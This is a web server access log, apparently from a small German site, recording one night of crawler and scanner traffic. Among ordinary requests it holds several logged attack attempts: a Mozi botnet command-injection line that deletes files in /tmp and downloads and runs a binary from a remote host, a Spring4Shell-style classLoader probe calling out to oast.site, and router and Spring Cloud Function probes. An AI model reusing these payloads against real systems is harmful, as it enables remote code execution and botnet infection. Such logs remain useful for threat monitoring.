52.167.144.24 - - [01/Jul/2025:02:18:59 +0200] "GET /www.mbingenieure.de/ HTTP/1.1" 404 336 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
176.65.148.166 - - [01/Jul/2025:02:19:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
121.187.15.141 - - [01/Jul/2025:02:20:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "curl/7.88.1"
176.65.148.166 - - [01/Jul/2025:02:21:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.83 - - [01/Jul/2025:02:21:24 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
45.135.193.162 - - [01/Jul/2025:02:23:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.131.155.254 - - [01/Jul/2025:02:24:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:02:24:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:02:24:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:02:24:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
180.191.255.192 - - [01/Jul/2025:02:25:24 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://180.191.255.192:52878/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
89.248.168.227 - - [01/Jul/2025:02:28:44 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 zgrab/0.x"
89.248.168.227 - - [01/Jul/2025:02:28:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
95.214.53.84 - - [01/Jul/2025:02:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
43.153.123.3 - - [01/Jul/2025:02:32:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.135.193.162 - - [01/Jul/2025:02:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.135.193.162 - - [01/Jul/2025:02:40:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.135.193.162 - - [01/Jul/2025:02:40:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.135.193.162 - - [01/Jul/2025:02:42:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.84.143.10 - - [01/Jul/2025:02:44:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "curl/7.88.1"
95.214.53.84 - - [01/Jul/2025:02:44:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
95.214.53.84 - - [01/Jul/2025:02:45:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
43.152.72.244 - - [01/Jul/2025:02:46:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
77.90.153.48 - - [01/Jul/2025:02:47:57 +0200] "POST /functionRouter HTTP/1.1" 404 319 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:02:47:58 +0200] "GET /?class.module.classLoader.resources.context.configFile=https://d1f553p9gkq560tu7mcgge58ta7rz5c36.oast.site&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:02:47:58 +0200] "GET /?class.module.classLoader.resources.context.configFile=http://d1f553p9gkq560tu7mcgqcg8hxarhwdy3.oast.site&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
77.90.153.48 - - [01/Jul/2025:02:47:58 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
77.90.153.48 - - [01/Jul/2025:02:47:58 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
